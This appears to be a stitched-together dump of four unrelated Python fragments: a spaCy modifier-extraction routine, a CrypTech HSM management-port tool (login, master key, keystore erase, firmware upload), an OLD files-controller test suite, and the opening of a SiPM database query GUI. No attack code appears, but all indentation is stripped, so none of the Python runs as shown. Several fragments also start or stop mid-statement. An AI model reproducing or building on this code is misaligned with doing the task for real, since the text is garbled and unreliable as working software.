replace_stopwords=False,
get_maps=True)
sentence_modifiers = list()
src_term_rep = spacy_sent_rep[src_word_loc]
src_term_lemma = src_term_rep.lower_ if \
src_term_rep.lemma_ == '-PRON-' or src_term_rep.lemma_.isdigit() else src_term_rep.lemma_.lower()
src_term_lemma = src_term_lemma.strip(punctuation_plus_space)
# Identify modifiers
children = [child for child in src_term_rep.children]
for child in children:
# Obtain lemmas
child_lemma = \
child.lower_ if child.lemma_ == '-PRON-' or child.lemma_.isdigit() else child.lemma_.lower()
child_lemma = child_lemma.strip(punctuation_plus_space)
# Filter by pos
if child.pos_ in MODIFIERS_POS_SET and child_lemma != src_term_lemma \
and child.text not in CONTRACTIONS and len(child_lemma) > 1:
sentence_modifiers.append(child_lemma)
# Evaluate head
head = src_term_rep.head
head_lemma = head.lower_ if head.lemma_ == '-PRON-' or head.lemma_.isdigit() else head.lemma_.lower()
head_lemma = head_lemma.strip(punctuation_plus_space)
# Filter by pos
if head.pos_ in MODIFIERS_POS_SET and head_lemma != src_term_lemma \
and head.text not in CONTRACTIONS and len(head_lemma) > 1:
sentence_modifiers.append(head_lemma)
seed_parses[seed_sentence] = \
(spacy_sent_rep, spacy_tokens_lower, ws_tokens, ws_tokens_lower, spacy_to_ws_map, sentence_modifiers,
(src_word_loc, adversarial_cluster, attractor))
return seed_parses
def _score_attractor_with_modifiers(attractor,
attractor_table,
modifier_tokens,
modifier_lemmas,
seed_attractor_tokens,
adversarial_attractor_tokens,
metric='[SORTED ATTRACTORS BY FREQ]'):
""" Helper function that scores attractors according to their 'typicality' respective the relevant clusters """
# Look up attractor lemma
attractor_lemma = attractor_table['[CONTEXT TOKENS]'][attractor]['[LEMMA]']
# Check if lemma is among modifier lemmas
if modifier_lemmas.get(attractor_lemma, None) is None:
return False
else:
# Exclude rare observations
if modifier_lemmas[attractor_lemma]['[MODIFIERS WITH FREQ]'] < 1:
return False
return True
def _reformat_modifiers(modifiers_entry, seed_cluster):
""" Re-formats modifier table entries for faster lookup of scores """
# Reformat seed modifiers
modifier_tokens = dict()
modifier_lemmas = dict()
metric_keys = [key for key in modifiers_entry[seed_cluster].keys() if key.startswith('[MODIFIERS WITH ')]
if not modifiers_entry.get(seed_cluster, None):
return modifier_tokens, modifier_lemmas
# Iterate
for mod_lemma in modifiers_entry[seed_cluster]['[MODIFIERS]'].keys():
# Restrict to adjectives
if 'amod' in modifiers_entry[seed_cluster]['[MODIFIERS]'][mod_lemma]['[DEP TAGS]'] and \
'ADJ' in modifiers_entry[seed_cluster]['[MODIFIERS]'][mod_lemma]['[POS]']:
modifier_lemmas[mod_lemma] = dict()
for metric in metric_keys:
| |
<gh_stars>0
#!/usr/bin/env python
# Copyright (c) 2019 Diamond Key Security, NFP
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# - Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# - Neither the name of the NORDUnet nor the names of its contributors may
# be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
# PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
# TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import os.path
import time
from enum import IntEnum
from cryptech.upload import ManagementPortSerial, send_file
from cryptech_port import DKS_HALError
from stoppable_thread import stoppable_thread
from statusobject import StatusObject, SetStatus
from hsm import UploadArgs
HSM_BINARY_FILE = "hsm-190821a.bin"
BOOTLOADER_BINARY_FILE = "bootloader.bin"
FPGA_BITSTREAM_FILE = "alpha_fmc.bit"
class CTYError(IntEnum):
CTY_OK = 0,
CTY_NOT_CONNECTED = 1,
CTY_NOT_LOGGED_IN = 2,
CTY_INCORRECT_PASSWORD = 3,
CTY_ERROR = 4
class WaitFeedback(stoppable_thread):
def __init__(self, feedback_function):
self.feedback_function = feedback_function
self.index = -1
super(WaitFeedback, self).__init__(self.loop, "WaitFeedback")
def loop(self):
if (self.index != -1):
self.feedback_function('\b\b\b')
else:
self.feedback_function('\r\n')
self.index += 1
if ((self.index % 4) == 0): self.feedback_function(' - ')
elif ((self.index % 4) == 1): self.feedback_function(' \\ ')
elif ((self.index % 4) == 2): self.feedback_function(' | ')
elif ((self.index % 4) == 3): self.feedback_function(' / ')
time.sleep(0.125)
@classmethod
def Start(cls, feedback_function):
feedback = cls(feedback_function)
feedback.start()
return feedback
class CTYConnection(StatusObject):
"""High-level interface for connecting to alpha's CTY port """
def __init__(self, cty_list, binary_path, feedback_function):
super(CTYConnection, self).__init__()
self.cty_list = cty_list
self.is_logged_in = False
self.binary_path = binary_path
self.feedback_function = feedback_function
self.errors = { CTYError.CTY_OK:"Connection to CrypTech Management Port successful",
CTYError.CTY_NOT_CONNECTED:"Not connected to a CrypTech device",
CTYError.CTY_NOT_LOGGED_IN:"Not logged in to a CrypTech device",
CTYError.CTY_INCORRECT_PASSWORD:"<PASSWORD>",
CTYError.CTY_ERROR:"Error sending command to CrypTech device" }
def get_error_msg(self, error):
if(error in self.errors):
return self.errors[error]
else:
return "Unknown CTY error"
@property
def cty_count(self):
return len(self.cty_list)
def is_cty_connected(self):
return self.cty_count > 0
def feedback(self, message):
if (self.feedback_function is not None):
self.feedback_function(message)
def send_raw(self, cmd, serial, delay):
cryptech_prompt = "\r\ncryptech> "
response_from_device = ""
serial.write(cmd)
serial.read_timeout = 0.5
for _ in xrange(0, delay):
time.sleep(1)
response_from_device = "%s%s"%(response_from_device, serial.read())
if(response_from_device.endswith(cryptech_prompt)):
response_from_device = response_from_device[:-len(cryptech_prompt)]
break
serial.read_timeout = None
return response_from_device
def send_raw_all(self, cmd, delay):
response = ''
with SetStatus(self, "Sending raw command"):
for device_index in xrange(0, len(self.cty_list)):
response_from_device = ""
with WaitFeedback.Start(self.feedback):
management_port_serial = self.cty_list[device_index].serial
response_from_device = self.send_raw(cmd, management_port_serial, delay)
response = '%s\r\nCTY:%i-%s'%(response, device_index, response_from_device)
return "--------------%s--------------"%response
def login(self, username, pin):
# make sure we're actually connected to an alpha
if(not self.is_cty_connected()): return CTYError.CTY_NOT_CONNECTED
self.logout()
with SetStatus(self, "Logging in"):
with WaitFeedback.Start(self.feedback):
for hsm_cty in self.cty_list:
management_port_serial = hsm_cty.serial
management_port_serial.args.username = username
management_port_serial.args.pin = pin
# use execute to login
response = management_port_serial.execute("\r")
if not response.endswith(("> ", "# ")):
return CTYError.CTY_INCORRECT_PASSWORD
# clear PIN
management_port_serial.args.pin = '1234'
self.is_logged_in = True
return CTYError.CTY_OK
def logout(self):
# make sure we're actually connected to an alpha
if(not self.is_cty_connected()): return CTYError.CTY_NOT_CONNECTED
with SetStatus(self, "Logging out"):
with WaitFeedback.Start(self.feedback):
for hsm_cty in self.cty_list:
management_port_serial = hsm_cty.serial
management_port_serial.write("\r")
prompt = management_port_serial.read()
assert "bootloader" not in prompt
if not prompt.endswith("Username: "):
management_port_serial.write("exit\r")
prompt = management_port_serial.read()
if not prompt.endswith("Username: "):
return CTYError.CTY_ERROR
self.is_logged_in = False
return CTYError.CTY_OK
def setMasterKey(self, masterkey):
# make sure we have an alpha that's ready to receive commands
ready_state = self.check_ready()
if(ready_state is not CTYError.CTY_OK): return ready_state
if masterkey is not None:
cmd = "masterkey set %s\r"%masterkey
else:
cmd = "masterkey set\r"
self.feedback('\r\nSetting master key. This may take upto 45 seconds.')
with SetStatus(self, "Setting Master Key"):
for i in xrange(0, len(self.cty_list)):
with WaitFeedback.Start(self.feedback):
# set the master key on one alpha and get the result
management_port_serial = self.cty_list[i].serial
time.sleep(20)
management_port_serial.write(cmd)
response = management_port_serial.read()
if("Failed" in response):
return response
response.strip("\r\n")
try:
if(i == 0):
# this is the first one
# parse the result to get the master key
split_reponse = response.split()
# find the start
start = 1
for token in split_reponse:
if('key:' in token):
break
start += 1
# tokens from (start) to (start+7) are the master key
masterkey = ""
for i in xrange(start, start+8):
masterkey += "%s "%split_reponse[i]
# send master key to all other alphas
cmd = "masterkey set %s\r"%masterkey
except Exception as e:
return "Failed parsing output from CTY:%i - %s"%(i, e.message)
# show the result to the user
return "\r\n\r\nSuccess:%s key:\r\n%s\r\n"%(split_reponse[start-2], masterkey)
def _parseMKMStatus(self, status):
if (status.startswith("Set")):
return DKS_HALError.HAL_OK
elif (status.startswith("Not set")):
return DKS_HALError.HAL_ERROR_MASTERKEY_NOT_SET
else:
return DKS_HALError.HAL_ERROR_MASTERKEY_FAIL
def getMasterKeyStatus(self):
cmd = "masterkey status\r"
result = []
with SetStatus(self, "Getting Master Key Status"):
for device_index in xrange(len(self.cty_list)):
response_from_device = ""
with WaitFeedback.Start(self.feedback):
management_port_serial = self.cty_list[device_index].serial
response_from_device = self.send_raw(cmd, management_port_serial, 2)
# parse the response
lines = response_from_device.splitlines()
status = {}
for line in lines:
if (line.startswith(" volatile: ")):
status['volatile'] = self._parseMKMStatus(line[len(" volatile: "):])
elif (line.startswith(" flash: ")):
status['flash'] = self._parseMKMStatus(line[len(" flash: "):])
result.append(status)
return result
def setPassword(self, user, newPIN):
# make sure we have an alpha that's ready to receive commands
ready_state = self.check_ready()
if(ready_state is not CTYError.CTY_OK): return ready_state
cmd = "\rkeystore set pin %s %s\r"%(user, newPIN)
with SetStatus(self, "Setting Password"):
for hsm_cty in self.cty_list:
with WaitFeedback.Start(self.feedback):
management_port_serial = hsm_cty.serial
management_port_serial.write(cmd)
time.sleep(8)
# get response
management_port_serial.read()
# make sure we get the real prompt
management_port_serial.write("\r")
management_port_serial.read()
return CTYError.CTY_OK
def clearKeyStore(self, preservePINs):
# make sure we have an alpha that's ready to receive commands
ready_state = self.check_ready()
if(ready_state is not CTYError.CTY_OK): return ready_state
cmd = "keystore erase YesIAmSure"
if(preservePINs):
cmd += ' preservePINs'
cmd += '\r'
self.feedback('\r\nClearing the keystore. This may take upto 45 seconds.')
with SetStatus(self, "Clearing Keystore"):
with WaitFeedback.Start(self.feedback):
for hsm_cty in self.cty_list:
management_port_serial = hsm_cty.serial
management_port_serial.write(cmd)
prompt = management_port_serial.read()
print prompt
time.sleep(45)
return CTYError.CTY_OK
def uploadFPGABitStream(self, username, PIN, cty_index = None):
# make sure we have an alpha that's ready to receive commands
ready_state = self.check_ready()
if(ready_state is not CTYError.CTY_OK): return ready_state
name = os.path.join(self.binary_path, FPGA_BITSTREAM_FILE)
upload_args = UploadArgs(fpga = True, pin = PIN, username=username)
if (cty_index is None):
with SetStatus(self, "Updating CrypTech FPGA Bitstream - ALL"):
return self._do_upload(name = name, upload_args = upload_args, cty_index = cty_index)
else:
return self._do_upload(name = name, upload_args = upload_args, cty_index = cty_index)
def uploadBootloader(self, username, PIN, cty_index = None):
# make sure we have an alpha that's ready to receive commands
ready_state = self.check_ready()
if(ready_state is not CTYError.CTY_OK): return ready_state
name = os.path.join(self.binary_path, BOOTLOADER_BINARY_FILE)
upload_args = UploadArgs(bootloader = True, pin = PIN, username=username)
if (cty_index is None):
with SetStatus(self, "Updating CrypTech Bootloader - ALL"):
return self._do_upload(name = name, upload_args = upload_args, cty_index = cty_index)
else:
return self._do_upload(name = name, upload_args = upload_args, cty_index = cty_index)
def uploadFirmware(self, username, PIN, cty_index = None):
# make sure we have an alpha that's ready to receive commands
ready_state = self.check_ready()
if(ready_state is not CTYError.CTY_OK): return ready_state
name = os.path.join(self.binary_path, HSM_BINARY_FILE)
upload_args = UploadArgs(firmware = True, pin = PIN, username=username)
if (cty_index is None):
with SetStatus(self, "Updating CrypTech Firmware - ALL"):
return self._do_upload(name = name, upload_args = upload_args, cty_index = cty_index)
else:
return self._do_upload(name = name, upload_args = upload_args, cty_index = cty_index)
def uploadTamperFirmware(self, username, PIN, cty_index = None):
# make sure we have an alpha that's ready to receive commands
ready_state = self.check_ready()
if(ready_state is not CTYError.CTY_OK): return ready_state
return self._do_upload(self.binary_path + | |
# Copyright 2016 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import logging
import simplejson as json
import os
from base64 import b64encode
from nose.tools import nottest
from mimetypes import guess_type
from onlinelinguisticdatabase.tests import TestController, url
import onlinelinguisticdatabase.model as model
from onlinelinguisticdatabase.model.meta import Session
import onlinelinguisticdatabase.lib.helpers as h
from onlinelinguisticdatabase.lib.SQLAQueryBuilder import SQLAQueryBuilder
try:
import Image
except ImportError:
try:
from PIL import Image
except ImportError:
Image = None
log = logging.getLogger(__name__)
class TestFilesController(TestController):
def tearDown(self):
TestController.tearDown(self, del_global_app_set=True,
dirs_to_clear=['files_path', 'reduced_files_path'])
@nottest
def test_index(self):
"""Tests that GET /files returns a JSON array of files with expected values."""
# Test that the restricted tag is working correctly.
# First get the users.
users = h.get_users()
contributor_id = [u for u in users if u.role == u'contributor'][0].id
# Then add a contributor and a restricted tag.
restricted_tag = h.generate_restricted_tag()
my_contributor = h.generate_default_user()
my_contributor_first_name = u'Mycontributor'
my_contributor.first_name = my_contributor_first_name
Session.add_all([restricted_tag, my_contributor])
Session.commit()
my_contributor = Session.query(model.User).filter(
model.User.first_name == my_contributor_first_name).first()
my_contributor_id = my_contributor.id
restricted_tag = h.get_restricted_tag()
# Then add the default application settings with my_contributor as the
# only unrestricted user.
application_settings = h.generate_default_application_settings()
application_settings.unrestricted_users = [my_contributor]
Session.add(application_settings)
Session.commit()
# Finally, issue two POST requests to create two default files with the
# *default* contributor as the enterer. One file will be restricted and
# the other will not be.
extra_environ = {'test.authentication.id': contributor_id,
'test.application_settings': True}
wav_file_path = os.path.join(self.test_files_path, 'old_test.wav')
wav_file_base64_encoded = b64encode(open(wav_file_path).read())
jpg_file_path = os.path.join(self.test_files_path, 'old_test.jpg')
jpg_file_base64_encoded = b64encode(open(jpg_file_path).read())
# Create the restricted file.
params = self.file_create_params_base64.copy()
params.update({
'filename': u'test_restricted_file.wav',
'base64_encoded_file': wav_file_base64_encoded,
'tags': [h.get_tags()[0].id] # the restricted tag should be the only one
})
params = json.dumps(params)
response = self.app.post(url('files'), params, self.json_headers,
extra_environ)
resp = json.loads(response.body)
restricted_file_id = resp['id']
# Create the unrestricted file.
params = self.file_create_params_base64.copy()
params.update({
'filename': u'test_unrestricted_file.jpg',
'base64_encoded_file': jpg_file_base64_encoded
})
params = json.dumps(params)
response = self.app.post(url('files'), params, self.json_headers,
extra_environ)
resp = json.loads(response.body)
# Expectation: the administrator, the default contributor (qua enterer)
# and the unrestricted my_contributor should all be able to view both files.
# The viewer will only receive the unrestricted file.
# An administrator should be able to view both files.
extra_environ = {'test.authentication.role': 'administrator',
'test.application_settings': True}
response = self.app.get(url('files'), headers=self.json_headers,
extra_environ=extra_environ)
resp = json.loads(response.body)
assert len(resp) == 2
assert resp[0]['filename'] == u'test_restricted_file.wav'
assert resp[1]['filename'] == u'test_unrestricted_file.jpg'
assert response.content_type == 'application/json'
# The default contributor (qua enterer) should also be able to view both
# files.
extra_environ = {'test.authentication.id': contributor_id,
'test.application_settings': True}
response = self.app.get(url('files'), headers=self.json_headers,
extra_environ=extra_environ)
resp = json.loads(response.body)
assert len(resp) == 2
# Mycontributor (an unrestricted user) should also be able to view both
# files.
extra_environ = {'test.authentication.id': my_contributor_id,
'test.application_settings': True}
response = self.app.get(url('files'), headers=self.json_headers,
extra_environ=extra_environ)
resp = json.loads(response.body)
assert len(resp) == 2
# A (not unrestricted) viewer should be able to view only one file.
extra_environ = {'test.authentication.role': 'viewer',
'test.application_settings': True}
response = self.app.get(url('files'), headers=self.json_headers,
extra_environ=extra_environ)
resp = json.loads(response.body)
assert len(resp) == 1
# Remove Mycontributor from the unrestricted users list and access to
# the second file will be denied.
application_settings = h.get_application_settings()
application_settings.unrestricted_users = []
Session.add(application_settings)
Session.commit()
# Mycontributor (no longer an unrestricted user) should now *not* be
# able to view the restricted file.
extra_environ = {'test.authentication.id': my_contributor_id,
'test.application_settings': True,
'test.retain_application_settings': True}
response = self.app.get(url('files'), headers=self.json_headers,
extra_environ=extra_environ)
resp = json.loads(response.body)
assert len(resp) == 1
# Remove the restricted tag from the file and the viewer should now be
# able to view it too.
restricted_file = Session.query(model.File).get(restricted_file_id)
restricted_file.tags = []
Session.add(restricted_file)
Session.commit()
extra_environ = {'test.authentication.role': 'viewer',
'test.application_settings': True}
response = self.app.get(url('files'), headers=self.json_headers,
extra_environ=extra_environ)
resp = json.loads(response.body)
assert len(resp) == 2
# Clear all Files (actually, everything but the tags, users and languages)
h.clear_all_models(['User', 'Tag', 'Language'])
# Now add 100 files. The even ones will be restricted, the odd ones not.
# These files will be deficient, i.e., have no binary data or MIME_type
# but that's ok ...
def create_file_from_index(index):
file = model.File()
file.filename = u'name_%d.jpg' % index
return file
files = [create_file_from_index(i) for i in range(1, 101)]
Session.add_all(files)
Session.commit()
files = h.get_files()
restricted_tag = h.get_restricted_tag()
for file in files:
if int(file.filename.split('_')[1].split('.')[0]) % 2 == 0:
file.tags.append(restricted_tag)
Session.add(file)
Session.commit()
files = h.get_files() # ordered by File.id ascending
# An administrator should be able to retrieve all of the files.
extra_environ = {'test.authentication.role': 'administrator',
'test.application_settings': True}
response = self.app.get(url('files'), headers=self.json_headers,
extra_environ=extra_environ)
resp = json.loads(response.body)
assert len(resp) == 100
assert resp[0]['filename'] == u'name_1.jpg'
assert resp[0]['id'] == files[0].id
# Test the paginator GET params.
paginator = {'items_per_page': 23, 'page': 3}
response = self.app.get(url('files'), paginator, headers=self.json_headers,
extra_environ=extra_environ)
resp = json.loads(response.body)
assert len(resp['items']) == 23
assert resp['items'][0]['filename'] == files[46].filename
# Test the order_by GET params.
order_by_params = {'order_by_model': 'File', 'order_by_attribute': 'filename',
'order_by_direction': 'desc'}
response = self.app.get(url('files'), order_by_params,
headers=self.json_headers, extra_environ=extra_environ)
resp = json.loads(response.body)
result_set = sorted([f.filename for f in files], reverse=True)
assert result_set == [f['filename'] for f in resp]
assert response.content_type == 'application/json'
# Test the order_by *with* paginator.
params = {'order_by_model': 'File', 'order_by_attribute': 'filename',
'order_by_direction': 'desc', 'items_per_page': 23, 'page': 3}
response = self.app.get(url('files'), params,
headers=self.json_headers, extra_environ=extra_environ)
resp = json.loads(response.body)
assert result_set[46] == resp['items'][0]['filename']
# The default viewer should only be able to see the odd numbered files,
# even with a paginator.
items_per_page = 7
page = 7
paginator = {'items_per_page': items_per_page, 'page': page}
extra_environ = {'test.authentication.role': 'viewer',
'test.application_settings': True}
response = self.app.get(url('files'), paginator, headers=self.json_headers,
extra_environ=extra_environ)
resp = json.loads(response.body)
assert len(resp['items']) == items_per_page
assert resp['items'][0]['filename'] == u'name_%d.jpg' % (
((items_per_page * (page - 1)) * 2) + 1)
# Expect a 400 error when the order_by_direction param is invalid
order_by_params = {'order_by_model': 'File', 'order_by_attribute': 'filename',
'order_by_direction': 'descending'}
response = self.app.get(url('files'), order_by_params, status=400,
headers=self.json_headers, extra_environ=extra_environ)
resp = json.loads(response.body)
assert resp['errors']['order_by_direction'] == u"Value must be one of: asc; desc (not u'descending')"
# Expect the default BY id ASCENDING ordering when the order_by_model/Attribute
# param is invalid.
order_by_params = {'order_by_model': 'Fileage', 'order_by_attribute': 'nom',
'order_by_direction': 'desc'}
response = self.app.get(url('files'), order_by_params,
headers=self.json_headers, extra_environ=extra_environ)
resp = json.loads(response.body)
assert resp[0]['id'] == files[0].id
# Expect a 400 error when the paginator GET params are empty, not
# specified or integers that are less than 1
paginator = {'items_per_page': u'a', 'page': u''}
response = self.app.get(url('files'), paginator, headers=self.json_headers,
extra_environ=extra_environ, status=400)
resp = json.loads(response.body)
assert resp['errors']['items_per_page'] == u'Please enter an integer value'
assert resp['errors']['page'] == u'Please enter a value'
paginator = {'items_per_page': 0, 'page': -1}
response = self.app.get(url('files'), paginator, headers=self.json_headers,
extra_environ=extra_environ, status=400)
resp = json.loads(response.body)
assert resp['errors']['items_per_page'] == u'Please enter a number that is 1 or greater'
assert resp['errors']['page'] == u'Please enter a number that is 1 or greater'
assert response.content_type == 'application/json'
@nottest
def test_create(self):
"""Tests that POST /files correctly creates a new file."""
########################################################################
# base64-encoded file creation
########################################################################
# Pass some mal-formed JSON to test that a 400 error is returned.
params = u'"a' # Bad JSON
response = self.app.post(url('files'), params, self.json_headers,
self.extra_environ_admin, status=400)
resp = json.loads(response.body)
assert resp['error'] == u'JSON decode error: the parameters provided were not valid JSON.'
# Create a test audio file.
wav_file_path = os.path.join(self.test_files_path, 'old_test.wav')
wav_file_size = os.path.getsize(wav_file_path)
params = self.file_create_params_base64.copy()
params.update({
'filename': u'old_test.wav',
'base64_encoded_file': b64encode(open(wav_file_path).read())
})
params = json.dumps(params)
response = self.app.post(url('files'), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
file_count = Session.query(model.File).count()
assert resp['filename'] == u'old_test.wav'
assert resp['MIME_type'] == u'audio/x-wav'
assert resp['size'] == wav_file_size
assert resp['enterer']['first_name'] == u'Admin'
assert file_count == 1
assert response.content_type == 'application/json'
# Create a test image file.
jpg_file_path = os.path.join(self.test_files_path, 'old_test.jpg')
jpg_file_size = os.path.getsize(jpg_file_path)
jpg_file_base64 = b64encode(open(jpg_file_path).read())
params = self.file_create_params_base64.copy()
params.update({
'filename': u'old_test.jpg',
'base64_encoded_file': jpg_file_base64
})
params = json.dumps(params)
response = self.app.post(url('files'), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
file_count = Session.query(model.File).count()
file_id = an_image_id = resp['id']
assert resp['filename'] == u'old_test.jpg'
assert | |
# -*- coding: utf-8 -*-
## File = "SipmQuerryRoot.py"
##
## Modified by cmj2018Mar28... Changed the directory structure and calls DataLoader versions so these could be accounted for.
## This version uses the old hdbClient_v1_3a
## Modifed by cmj2018Mar28... Change "crvUtilities2017.zip" to "crvUtilities.zip"
## Modified by cmj2018May30... Change to hdbClient_v2_0
##
## Derived from File = "SipmQuerryRoot2017Jul27.py"\
## Derived from File = "SipmQuerry2017Jul22.py"
## Derived from File = "SipmQuerry2017Jul22.py"
## Derived from File = "extrusionQuerry2017Jul22.py"
## Derived from File = "extrusionQuerry2017Jul19.py"
##
## Use matplotlib to plot graphs
## Re-arrange the GUI...
## Inlucde a list box to display all avaialble batches
## Plot with PyRoot!
##
## Modified by cmj to add root extras!
##
## Derived from File = "extrusionQuerry2017Jul16.py"
## Derived from File = "extrusionQuerry2017Jul16.py"
## Derived from File = "extrusionQuerry2017Jul15.py"
## Derived from File = "extrusionQuerry2017Jul14.py"
## Derived from File = "extrusionQuerry2017Jul13.py"
##
#!/usr/bin/env python
##
## A python script that uses a Graphical User Interface
## to allow querry of the Sipm database and plot
## the test results..
##
## Written by <NAME>
## Department of Physics
## University of South Alabama
##
## Modified by cmj2018May31.... Include new Sipm Measurements types
## Modified by cmj2018Jul26... Initialize bytearry strings with each event in root tree
## Modified by cmj2018Oct5... Fix bug... return the Production database Query URL instead of the Write URL
## Modified by cmj2018Oct9.... Change to hdbClient_v2_2
## Modified by cmj2020Jun16... Change to cmjGuiLibGrid2019Jan30
## Modified by cmj2020Jul13... Add progress bar
## Modified by cmj 2020Aug03 cmjGuiLibGrid2019Jan30 -> cmjGuiLibGrid
## Modified by cmj2020Dec16... replace hdbClient_v2_2 with hdbClient_v3_3 - and (&) on query works
## Modified by cmj2021Mar1.... Convert from python2 to python3: 2to3 -w *.py
## Modified by cmj2021Mar1.... replace dataloader with dataloader3
## Modified by cmj2021May11... replace dataloader3.zip with dataloader.zip
## Modified by cmj2021May12... replaced tabs with 6 spaces to convert to python 3
## Modified by cmj2022Jan25... save character string in root tree with python3
## Modified by cmj2022Jan28... replace "count(*)" with single view table as per Steve's Email 2022Jan28 11:10 AM
##
from tkinter import * # get widget class
import tkinter as tk
from tkinter.ttk import * # get tkk widget class (for progess bar)
import sys
from collections import defaultdict ## needed for two dimensional dictionaries
sys.path.append("../../Utilities/hdbClient_v3_3/Dataloader.zip") ## 2021May11
sys.path.append("../CrvUtilities/crvUtilities.zip") ## 2020Jul02 add highlight to scrolled list
from DataLoader import *
from databaseConfig import *
from cmjGuiLibGrid import * ## 2020Aug03
from generalUtilities import generalUtilities ## this is needed for three dimensional dictionaries
##
import os
import sys ##
import optparse ## parser module... to parse the command line arguments
import math
import time
import array
## Import the graphing modules
## Import for PyRoot
import ROOT as _root ## import to define vectors which are used to save strings.. 2022Jan25
from ROOT import TCanvas, TFile, TProfile, TNtuple, TH1F, TH2F, TGraph, TStyle, TTree, TString
from ROOT import gROOT, gBenchmark, gRandom, gSystem, gStyle, Double_t
from array import array
##
##
ProgramName = "SipmQueryRoot"
Version = "version2022.01.28"
##
##
##
##
## -------------------------------------------------------------
## A class to set up the main window to drive the
## python GUI
##
class multiWindow(Frame):
def __init__(self,parent=NONE, myRow = 0, myCol = 0):
Frame.__init__(self,parent)
self.__database_config = databaseConfig()
self.setupDevelopmentDatabase() ## set up communications with database
self.__cmjPlotDiag = 2 ## default... not debug messages printed out
## Limit number of sipms read in for tests.... set negative to read all
self.__cmjTest = 0 ## set this to 1 to look at 10 sipm_id's
self.__cmjTestLimit = 100 ## When in test mode... look at this number of sipms.
self.__progressBarCount = tk.DoubleVar() ## for progress bar
self.__progressBarCount.set(0) ## for progress bar
self.__progressBarMaximum = 100000
## set up geometry for GUI
self.__labelWidth = 25
self.__entryWidth = 20
self.__buttonWidth = 5
self.__maxRow = 2
## Arrays to plot...keep these in scope in the whole class
self.__sipmMeasureTestDate = {} ## first key of the nested dictionaries
self.__saveTestType = {} ## dictionary of test types; key sipmMeasureDate
## Define a series of nested dictionaries to hold various quantities:
## keys [sipmMeasureDate][sipmId]
self.__sipmId = defaultdict(dict) ## second key for nested dictionaries
self.__sipmNumber = defaultdict(dict)
self.__testType = defaultdict(dict)
self.__workerBarCode = defaultdict(dict)
self.__workStationBarCode = defaultdict(dict)
self.__biasVoltage = defaultdict(dict)
self.__darkCount = defaultdict(dict)
self.__gain = defaultdict(dict)
self.__temperature = defaultdict(dict)
self.__breakdown_voltage = defaultdict(dict)
self.__dark_count_rate = defaultdict(dict)
self.__current_vs_voltage_condition = defaultdict(dict)
self.__x_talk = defaultdict(dict)
self.__led_response = defaultdict(dict)
self.__data_file_location = defaultdict(dict)
self.__data_file_name = defaultdict(dict)
self.__pack_number = defaultdict(dict)
## Nested Dictionaries to save I vs V data for each sipm, each test
## The keys to these dictionaries are [sipmMeasureDate][SipmId][binNumber]
self.__sipmMeasureTestDate_IvsV = {} ## first key in triple nested dictionary
self.__sipmId_IvsV = defaultdict(dict) ## second key in triple nested dictionary [sipmMeasureDate][SipmId]
self.__myMultiDimDictionary = generalUtilities()
self.__IvsV_current = self.__myMultiDimDictionary.nestedDict()
self.__IvsV_voltage = self.__myMultiDimDictionary.nestedDict()
## Most times the Sipms are tested once, but at different times....
## save all local tests in one root tree with the test date tagged.
self.__allSipmId = {} ## key [testDate+sipmId[testDate]]
self.__allSipmMeasureTestDate = {} ## key [testDate+sipmId[testDate]]
self.__allTestType = {} # key [testDate+sipmId[testDate]
self.__allWorkerBarCode = {} ## key [testDate+sipmId[testDate]]
self.__allWorkStationBarCode = {} ## key [testDate+sipmId[testDate]]
self.__allBiasVoltage = {} ## key [testDate+sipmId[testDate]]
self.__allDarkCount = {} ## key [testDate+sipmId[testDate]]
self.__allGain = {} ## key [testDate+sipmId[testDate]]
self.__allTemperature = {} ## key [testDate+sipmId[testDate]])
self.__allBreakdown_voltage = {} ## key [testDate+sipmId[testDate]]
self.__allDark_count_rate = {} ## key [testDate+sipmId[testDate]]
self.__allCurrent_vs_voltage_condition = {} ## key [testDate+sipmId[testDate]]
self.__allX_talk = {} ## key [testDate+sipmId[testDate]]
self.__allLed_response = {} ## key [testDate+sipmId[testDate]]
self.__allData_file_location = {} ## key [testDate+sipmId[testDate]]
self.__allData_file_name = {} ## key [testDate+sipmId[testDate]]
self.__allPack_number = {} ## key [testDate+sipmId[testDate]]
## Nested Dictionaries to save I vs V data for each sipm, each test
## The keys to these dictionaries are [ivsvTestDate+sipmId[testDate]][binNumber]
self.__All_IvsV_current = defaultdict(dict)
self.__All_IvsV_voltage = defaultdict(dict)
##
self.__sipmResults = []
self.__sipmPackNumberResults = {} ## dictionary to hold pack number: Key SipmId
self.__sipmIvsVresults =[]
## Dictionary of arrays to hold the Sipm Batch information
self.__sipmBatch={}
## Define Output Log file... remove this later
self.__mySaveIt = saveResult()
